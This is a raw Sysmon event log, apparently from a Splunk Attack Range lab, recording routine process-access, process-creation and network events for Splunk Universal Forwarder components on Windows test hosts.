10341000x800000000000000044347Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044346Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044345Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044344Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044343Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044342Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-184A-629A-1E07-000000006002}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044341Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-184A-629A-1E07-000000006002}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044340Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.280{0A5DF930-184A-629A-1E07-000000006002}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000044339Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.696{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52352-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044338Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.029{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=147779AB1AFB7EA5416B618D37B1CE40,SHA256=3B17B0E5C7DC9874673DE12DE24E0A6F498D3170D5AAEF2FC3FCCF1294547881,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044383Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.638{0A5DF930-184B-629A-2007-000000006002}2242496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044382Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-184B-629A-2007-000000006002}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044381Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044380Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044379Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044378Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044377Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044376Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044375Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044374Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044373Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044372Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-184B-629A-2007-000000006002}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044371Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.466{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-184B-629A-2007-000000006002}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044370Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.467{0A5DF930-184B-629A-2007-000000006002}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044369Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.248{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46360A87E0C87D925C2E82C29D52344E,SHA256=652160E396F95EB4DE9F8BF3B0DFED9D7A347B2426291C079245BE45FA970388,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044368Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:51.107{0A5DF930-184A-629A-1F07-000000006002}12763708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000205439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:49.663{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56382-false10.0.1.12-8000- 10341000x800000000000000044397Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-184C-629A-2107-000000006002}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044396Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044395Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 